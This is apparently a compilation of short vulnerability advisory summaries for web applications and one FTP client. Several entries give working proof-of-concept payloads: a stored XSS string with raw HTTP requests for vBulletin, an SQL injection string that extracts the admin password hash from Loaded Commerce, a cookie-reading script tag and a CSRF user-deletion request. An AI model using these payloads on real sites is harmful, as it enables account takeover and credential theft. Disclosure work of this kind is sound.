Latest vBulletin forum software suffers on persistent cross site scripting vulnerability, which most likely can be used against every user, such as administrator. Vulnerability is located at user profile page and will be executed whenever someone will visit it. Solution - proper filtration of image title value, in this case, it's about POST title_13 parameter. First step to reproduce the vulnerability, is to create a user account. By then, you should visit profile of the victim. Let's take as example following address: http://vbulletin/member/2-victim. Click 'Share photo' (camera icon), pick any image you like. You may add comment about photo, all you need to do is to add js payload. As comment, use something like - huh" onmouseover=alert(666) xss=" Request: POST /ajax/render/editor_gallery_photoblock HTTP/1.1 Host: vbulletin photocount=1&photos%5B0%5D%5Bfiledataid%5D=13&photos%5B0%5D%5Btitle%5D=cool%22+onmouseover%3Dalert(666)+xssed%3D%22&securitytoken=[TOKEN] Send image by clicking on 'Post' button. Request: POST /create-content/gallery HTTP/1.1 Host: vbulletin Content-Type: multipart/form-data; boundary=---------------------------18897880557155952661558219659 Content-Length: 1558 -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="securitytoken" 1409922799-a28bf50b7ee16f6bfc2b7c652946c366e25574d5 -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="text" -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="files"; filename="" Content-Type: application/octet-stream -----------------------------18897880557155952661558219659 Content-Disposition: form-data; name="uploadFrom" -----------------------------1889788055715595266155821 Visit profile of the victim, and you will see that XSS is triggered.
A vulnerability in the WordPress acento theme allows an attacker to download any file from the target server. The vulnerability exists due to insufficient validation of user-supplied input in the 'file' parameter of the 'view-pdf.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This will allow the attacker to download any file from the target server.
This plugin will allow administrator to delete user(s) account by entering their email address. By forcing the administrator to send a POST request to the URL http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php with the request de-text=<victim email>&submit=Search+and+Delete, the user with the given email address will be deleted.
php online chat suffer from xss in user panel. To exploit this vulnerability, a user must register as a user and inject a malicious JavaScript code into the message field on the http://path/phpchat/canned_opr.php page.
A SQL injection vulnerability exists in the Wordpress Like Dislike Counter Plugin, versions 1.2.3 and below. The vulnerability is due to insufficient sanitization of user-supplied input to the 'post_id' and 'up_type' parameters of the 'ajax_counter.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database.
Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection. Have a valid customer account and create a new contact in your address book using the following values. First name: :entry_lastname, Last Name : ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)# The new contact will be added to your address book with the admin hash as the contact's street address
IP Board 3.x versions suffer from a vulnerability which allows an attacker to steal the CSRF token of a specific user. The function which allows users to share forum links does not properly sanitize user input. The token is attached in the request as a GET parameter, so it is able to be obtained if the user is redirected to an evil domain. Using the token, it is able to perform various operations as demonstrated in the attached video.
A buffer overflow vulnerability exists in BulletProof FTP Client 2010, which could allow an attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to a boundary error when handling specially crafted Session-File (.bps) files. By convincing a user to open a specially crafted Session-File, an attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user.
This plugin allows you to add social networks, or related, in user profiles. The information will be shown in a user profile and visible for anyone who view the profile. Proof of Concept: 1. Login into your account. 2. Go to 'Edit Profile' page at '/usercp.php?action=profile' 3. Update your Social Network ID with '><script>alert(document.cookie)</script><' 4. The result can be seen in multiple places, including your profile page. The script will be executed whenever anyone view your profile. The result can also be seen in threads you involve IF the administrator configure this plugin to allow user's social sites information to be published in every post.
A vulnerability in the Wordpress Plugins Premium Gallery Manager allows an unauthenticated user to access the configuration of the plugin. This can be exploited by sending a POST request to the ajax.php file with the action set to 'save' and the values set to the desired configuration. This can be used to set the admin email, allow users to register, and set the default role to administrator.
Services By CQR